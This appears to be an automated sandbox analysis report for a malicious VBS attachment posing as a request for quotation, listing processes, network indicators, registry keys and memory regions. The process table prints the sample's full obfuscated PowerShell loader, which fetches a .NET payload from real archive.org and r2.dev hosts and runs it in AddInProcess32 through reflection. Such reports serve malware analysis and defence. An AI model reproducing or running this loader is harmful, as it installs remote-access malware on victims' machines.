Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
RFQ 2024.09.26-89 vivecta.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ehmoyid.0uz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajuujzvq.qqk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkzc0izb.yde.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he5jyahw.re5.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content
= (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent
= [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e
='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null,
[object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0}
, '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))')
-f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.J.
|
unknown
|
||
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pub-6346c84860d5480393a1799fb277dfdc.r2.dev
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
https://ia600100.us.arXJW
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev/bsnk.txt
|
172.66.0.235
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pub-6346c84860d5480393a1799fb277dfdc.r2.dev
|
172.66.0.235
|
||
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.66.0.235
|
pub-6346c84860d5480393a1799fb277dfdc.r2.dev
|
United States
|
||
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
217A3CCD000
|
trusted library allocation
|
page read and write
|
|
|
|
217ABD20000
|
trusted library section
|
page read and write
|
|
|
|
21793E27000
|
trusted library allocation
|
page read and write
|
||
|
21791790000
|
heap
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
21794D2C000
|
trusted library allocation
|
page read and write
|
||
|
265FD9F0000
|
heap
|
page read and write
|
||
|
7FFAACB13000
|
trusted library allocation
|
page execute and read and write
|
||
|
217AB9FB000
|
heap
|
page read and write
|
||
|
25AF9883000
|
heap
|
page read and write
|
||
|
25AF9511000
|
heap
|
page read and write
|
||
|
25AF763E000
|
heap
|
page read and write
|
||
|
21793C95000
|
trusted library allocation
|
page read and write
|
||
|
265FB9D8000
|
heap
|
page read and write
|
||
|
25AF96B6000
|
heap
|
page read and write
|
||
|
217918DB000
|
heap
|
page read and write
|
||
|
21793CBD000
|
trusted library allocation
|
page read and write
|
||
|
25AF953A000
|
heap
|
page read and write
|
||
|
7FFAACC30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB20000
|
trusted library allocation
|
page read and write
|
||
|
265FBAF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD00000
|
trusted library allocation
|
page execute and read and write
|
||
|
25AF962F000
|
heap
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
25AF95D1000
|
heap
|
page read and write
|
||
|
25AF76B8000
|
heap
|
page read and write
|
||
|
217AB776000
|
heap
|
page read and write
|
||
|
25AF7611000
|
heap
|
page read and write
|
||
|
25AF9630000
|
heap
|
page read and write
|
||
|
21791810000
|
trusted library allocation
|
page read and write
|
||
|
21791690000
|
heap
|
page read and write
|
||
|
265FDBDF000
|
heap
|
page read and write
|
||
|
265FD830000
|
heap
|
page execute and read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
25AF96B4000
|
heap
|
page read and write
|
||
|
25AF9849000
|
heap
|
page read and write
|
||
|
265804CB000
|
trusted library allocation
|
page read and write
|
||
|
21793A81000
|
trusted library allocation
|
page read and write
|
||
|
21791AA0000
|
heap
|
page read and write
|
||
|
26590010000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
D9E157E000
|
stack
|
page read and write
|
||
|
25AF94C6000
|
heap
|
page read and write
|
||
|
265FDBBB000
|
heap
|
page read and write
|
||
|
25AF94C9000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
25AF94C9000
|
heap
|
page read and write
|
||
|
217A36B1000
|
trusted library allocation
|
page read and write
|
||
|
25AF94E6000
|
heap
|
page read and write
|
||
|
D9E258D000
|
stack
|
page read and write
|
||
|
21793E1E000
|
trusted library allocation
|
page read and write
|
||
|
265FB963000
|
heap
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
25AF94E0000
|
heap
|
page read and write
|
||
|
25AF9511000
|
heap
|
page read and write
|
||
|
265FBA70000
|
heap
|
page read and write
|
||
|
265FB994000
|
heap
|
page read and write
|
||
|
21793CAD000
|
trusted library allocation
|
page read and write
|
||
|
25AF95F8000
|
heap
|
page read and write
|
||
|
21793F7E000
|
trusted library allocation
|
page read and write
|
||
|
21793A92000
|
trusted library allocation
|
page read and write
|
||
|
25AF95D4000
|
heap
|
page read and write
|
||
|
217936A0000
|
heap
|
page read and write
|
||
|
D9E14FD000
|
stack
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD25000
|
trusted library allocation
|
page read and write
|
||
|
217A36C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB30000
|
trusted library allocation
|
page read and write
|
||
|
25AF953A000
|
heap
|
page read and write
|
||
|
217A39AD000
|
trusted library allocation
|
page read and write
|
||
|
25AF9866000
|
heap
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D9E15FE000
|
stack
|
page read and write
|
||
|
265FDA56000
|
heap
|
page read and write
|
||
|
265805FC000
|
trusted library allocation
|
page read and write
|
||
|
C2CB27E000
|
stack
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
217AB7B0000
|
heap
|
page execute and read and write
|
||
|
25AF961D000
|
heap
|
page read and write
|
||
|
217AB850000
|
heap
|
page read and write
|
||
|
25AF9890000
|
heap
|
page read and write
|
||
|
C2CAEF9000
|
stack
|
page read and write
|
||
|
21794F5D000
|
trusted library allocation
|
page read and write
|
||
|
26580536000
|
trusted library allocation
|
page read and write
|
||
|
265FBAC0000
|
heap
|
page read and write
|
||
|
25AF9521000
|
heap
|
page read and write
|
||
|
25AF97C0000
|
heap
|
page read and write
|
||
|
25AF94C2000
|
heap
|
page read and write
|
||
|
7FFAACBC6000
|
trusted library allocation
|
page read and write
|
||
|
25AF7600000
|
heap
|
page read and write
|
||
|
265FBA3C000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
265FB950000
|
heap
|
page read and write
|
||
|
217919D4000
|
heap
|
page read and write
|
||
|
21791840000
|
heap
|
page readonly
|
||
|
7FFAACCB2000
|
trusted library allocation
|
page read and write
|
||
|
25AF94F1000
|
heap
|
page read and write
|
||
|
217ABBD0000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
25AF78E5000
|
heap
|
page read and write
|
||
|
21793597000
|
heap
|
page read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
25AF98C0000
|
heap
|
page read and write
|
||
|
25AF95C4000
|
heap
|
page read and write
|
||
|
C2CACFC000
|
stack
|
page read and write
|
||
|
25AF952E000
|
heap
|
page read and write
|
||
|
C2CB0FE000
|
stack
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
25AF9890000
|
heap
|
page read and write
|
||
|
7FFAACB2B000
|
trusted library allocation
|
page read and write
|
||
|
D9E1839000
|
stack
|
page read and write
|
||
|
21791850000
|
heap
|
page read and write
|
||
|
21793A7F000
|
trusted library allocation
|
page read and write
|
||
|
217A399F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
2658010B000
|
trusted library allocation
|
page read and write
|
||
|
25AF96B4000
|
heap
|
page read and write
|
||
|
21794FE4000
|
trusted library allocation
|
page read and write
|
||
|
21793ABA000
|
trusted library allocation
|
page read and write
|
||
|
25AF96B4000
|
heap
|
page read and write
|
||
|
25AF9850000
|
heap
|
page read and write
|
||
|
25AF95E8000
|
heap
|
page read and write
|
||
|
265FB959000
|
heap
|
page read and write
|
||
|
21794D32000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25AF94D1000
|
heap
|
page read and write
|
||
|
25AF997A000
|
heap
|
page read and write
|
||
|
7FFAACB14000
|
trusted library allocation
|
page read and write
|
||
|
25AF9526000
|
heap
|
page read and write
|
||
|
7FFAACE99000
|
trusted library allocation
|
page read and write
|
||
|
D9E116E000
|
stack
|
page read and write
|
||
|
21791AA4000
|
heap
|
page read and write
|
||
|
21793A8A000
|
trusted library allocation
|
page read and write
|
||
|
265FBAB6000
|
heap
|
page read and write
|
||
|
D9E167E000
|
stack
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
2179532E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB20000
|
trusted library allocation
|
page read and write
|
||
|
D9E1ABE000
|
stack
|
page read and write
|
||
|
25AF9890000
|
heap
|
page read and write
|
||
|
FFBE9FB000
|
stack
|
page read and write
|
||
|
2658009C000
|
trusted library allocation
|
page read and write
|
||
|
25AF9890000
|
heap
|
page read and write
|
||
|
25AF94C1000
|
heap
|
page read and write
|
||
|
25AF95C1000
|
heap
|
page read and write
|
||
|
25AF953A000
|
heap
|
page read and write
|
||
|
D9E16F8000
|
stack
|
page read and write
|
||
|
25AF9608000
|
heap
|
page read and write
|
||
|
D9E250E000
|
stack
|
page read and write
|
||
|
7FFAACB1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26580023000
|
trusted library allocation
|
page read and write
|
||
|
265FB860000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
265FBBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCC1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB14000
|
trusted library allocation
|
page read and write
|
||
|
26580606000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
26590073000
|
trusted library allocation
|
page read and write
|
||
|
21791830000
|
trusted library allocation
|
page read and write
|
||
|
25AF985D000
|
heap
|
page read and write
|
||
|
C2CA99F000
|
stack
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
25AF75A0000
|
heap
|
page read and write
|
||
|
25AF97A9000
|
heap
|
page read and write
|
||
|
21791892000
|
heap
|
page read and write
|
||
|
217AB853000
|
heap
|
page read and write
|
||
|
217AB9A2000
|
heap
|
page read and write
|
||
|
265FBA3F000
|
heap
|
page read and write
|
||
|
7FFAACE94000
|
trusted library allocation
|
page read and write
|
||
|
217AB706000
|
heap
|
page read and write
|
||
|
25AF997A000
|
heap
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
21793732000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
2658015B000
|
trusted library allocation
|
page read and write
|
||
|
265FB990000
|
heap
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
7FFAACBCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
7FFAACC30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
FFBE8FE000
|
stack
|
page read and write
|
||
|
25AF94F6000
|
heap
|
page read and write
|
||
|
217918D7000
|
heap
|
page read and write
|
||
|
25AF94CA000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
21794F88000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
265FD857000
|
heap
|
page execute and read and write
|
||
|
7FFAACCC1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
C2CAF77000
|
stack
|
page read and write
|
||
|
217AB7B6000
|
heap
|
page execute and read and write
|
||
|
25AF94D4000
|
heap
|
page read and write
|
||
|
21791898000
|
heap
|
page read and write
|
||
|
25AF94D1000
|
heap
|
page read and write
|
||
|
25AF97C1000
|
heap
|
page read and write
|
||
|
7FFAACBF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB10000
|
trusted library allocation
|
page read and write
|
||
|
C2CAE7E000
|
stack
|
page read and write
|
||
|
7FFAACEA3000
|
trusted library allocation
|
page read and write
|
||
|
25AF9637000
|
heap
|
page read and write
|
||
|
25AF95C0000
|
heap
|
page read and write
|
||
|
265FDBA0000
|
heap
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
217AB970000
|
heap
|
page read and write
|
||
|
21791980000
|
trusted library allocation
|
page read and write
|
||
|
25AF94C3000
|
heap
|
page read and write
|
||
|
D9E19BE000
|
stack
|
page read and write
|
||
|
D9E1B3B000
|
stack
|
page read and write
|
||
|
2179497E000
|
trusted library allocation
|
page read and write
|
||
|
25AF7626000
|
heap
|
page read and write
|
||
|
217AB99C000
|
heap
|
page read and write
|
||
|
217A3724000
|
trusted library allocation
|
page read and write
|
||
|
FFBE4FF000
|
stack
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
25AF9516000
|
heap
|
page read and write
|
||
|
265804FA000
|
trusted library allocation
|
page read and write
|
||
|
25AF95CD000
|
heap
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCCA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
21793A75000
|
trusted library allocation
|
page read and write
|
||
|
265FDE40000
|
heap
|
page read and write
|
||
|
25AF953A000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
FFBE0FE000
|
stack
|
page read and write
|
||
|
D9E147E000
|
stack
|
page read and write
|
||
|
25AF9868000
|
heap
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
25AF985C000
|
heap
|
page read and write
|
||
|
21795264000
|
trusted library allocation
|
page read and write
|
||
|
25AF983B000
|
heap
|
page read and write
|
||
|
217AB76B000
|
heap
|
page read and write
|
||
|
7FFAACB12000
|
trusted library allocation
|
page read and write
|
||
|
C2CA91E000
|
stack
|
page read and write
|
||
|
217AB6C0000
|
heap
|
page read and write
|
||
|
265FBB20000
|
heap
|
page readonly
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
25AF98C1000
|
heap
|
page read and write
|
||
|
2658011B000
|
trusted library allocation
|
page read and write
|
||
|
25AF76D0000
|
heap
|
page read and write
|
||
|
25AF78E0000
|
heap
|
page read and write
|
||
|
21794D44000
|
trusted library allocation
|
page read and write
|
||
|
25AF94C2000
|
heap
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
C2CB17E000
|
stack
|
page read and write
|
||
|
2179532A000
|
trusted library allocation
|
page read and write
|
||
|
25AF960D000
|
heap
|
page read and write
|
||
|
25AF7830000
|
heap
|
page read and write
|
||
|
217917D0000
|
heap
|
page read and write
|
||
|
C2CA9DE000
|
stack
|
page read and write
|
||
|
25AF9890000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
21794D56000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21791770000
|
heap
|
page read and write
|
||
|
217A46CD000
|
trusted library allocation
|
page read and write
|
||
|
C2CAFFD000
|
stack
|
page read and write
|
||
|
217AB830000
|
heap
|
page read and write
|
||
|
D9E173F000
|
stack
|
page read and write
|
||
|
7FFAACBC6000
|
trusted library allocation
|
page read and write
|
||
|
25AF986A000
|
heap
|
page read and write
|
||
|
7FFAACB13000
|
trusted library allocation
|
page execute and read and write
|
||
|
FFBE3FF000
|
stack
|
page read and write
|
||
|
25AF9884000
|
heap
|
page read and write
|
||
|
265FDAA0000
|
heap
|
page read and write
|
||
|
265FBA50000
|
heap
|
page read and write
|
||
|
217919D6000
|
heap
|
page read and write
|
||
|
7FFAACE81000
|
trusted library allocation
|
page read and write
|
||
|
21793AB6000
|
trusted library allocation
|
page read and write
|
||
|
21791870000
|
heap
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
D9E1A3E000
|
stack
|
page read and write
|
||
|
217919C0000
|
trusted library allocation
|
page read and write
|
||
|
25AF9506000
|
heap
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
217AB6B0000
|
heap
|
page read and write
|
||
|
265803BF000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
25AF94C5000
|
heap
|
page read and write
|
||
|
21794D52000
|
trusted library allocation
|
page read and write
|
||
|
25AF95FD000
|
heap
|
page read and write
|
||
|
265FD800000
|
heap
|
page read and write
|
||
|
25AF9608000
|
heap
|
page read and write
|
||
|
265FDA4C000
|
heap
|
page read and write
|
||
|
21794D79000
|
trusted library allocation
|
page read and write
|
||
|
265FBAB0000
|
heap
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
217AB766000
|
heap
|
page read and write
|
||
|
217AB940000
|
heap
|
page execute and read and write
|
||
|
25AF9859000
|
heap
|
page read and write
|
||
|
265FB9B0000
|
heap
|
page read and write
|
||
|
26580117000
|
trusted library allocation
|
page read and write
|
||
|
D9E10E3000
|
stack
|
page read and write
|
||
|
7FFAACD00000
|
trusted library allocation
|
page execute and read and write
|
||
|
26580069000
|
trusted library allocation
|
page read and write
|
||
|
25AF97A9000
|
heap
|
page read and write
|
||
|
25AF95DD000
|
heap
|
page read and write
|
||
|
25AF9618000
|
heap
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
217AB704000
|
heap
|
page read and write
|
||
|
265FDA30000
|
heap
|
page read and write
|
||
|
25AF94D6000
|
heap
|
page read and write
|
||
|
265FB99A000
|
heap
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25AF7636000
|
heap
|
page read and write
|
||
|
265FB9DD000
|
heap
|
page read and write
|
||
|
25AF953A000
|
heap
|
page read and write
|
||
|
25AF7637000
|
heap
|
page read and write
|
||
|
25AF9846000
|
heap
|
page read and write
|
||
|
265FB998000
|
heap
|
page read and write
|
||
|
21793A8E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
217919D0000
|
heap
|
page read and write
|
||
|
217AB768000
|
heap
|
page read and write
|
||
|
25AF7570000
|
heap
|
page read and write
|
||
|
FFBE7FE000
|
stack
|
page read and write
|
||
|
C2CB2FB000
|
stack
|
page read and write
|
||
|
7FFAACB1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
25AF96B4000
|
heap
|
page read and write
|
||
|
265FD990000
|
heap
|
page execute and read and write
|
||
|
25AF9846000
|
heap
|
page read and write
|
||
|
265FD9A0000
|
heap
|
page read and write
|
||
|
25AF986A000
|
heap
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACCF2000
|
trusted library allocation
|
page read and write
|
||
|
FFBE6FD000
|
stack
|
page read and write
|
||
|
21793DBC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
D9E11EE000
|
stack
|
page read and write
|
||
|
2179189E000
|
heap
|
page read and write
|
||
|
7FFAACBF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
25AF9628000
|
heap
|
page read and write
|
||
|
7FFAACCF2000
|
trusted library allocation
|
page read and write
|
||
|
217936B1000
|
trusted library allocation
|
page read and write
|
||
|
C2CB07B000
|
stack
|
page read and write
|
||
|
21791890000
|
heap
|
page read and write
|
||
|
25AF94CA000
|
heap
|
page read and write
|
||
|
21791A70000
|
heap
|
page execute and read and write
|
||
|
25AF96B4000
|
heap
|
page read and write
|
||
|
25AF95ED000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
7DF40DBF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
FFBE1FE000
|
stack
|
page read and write
|
||
|
25AF7580000
|
heap
|
page read and write
|
||
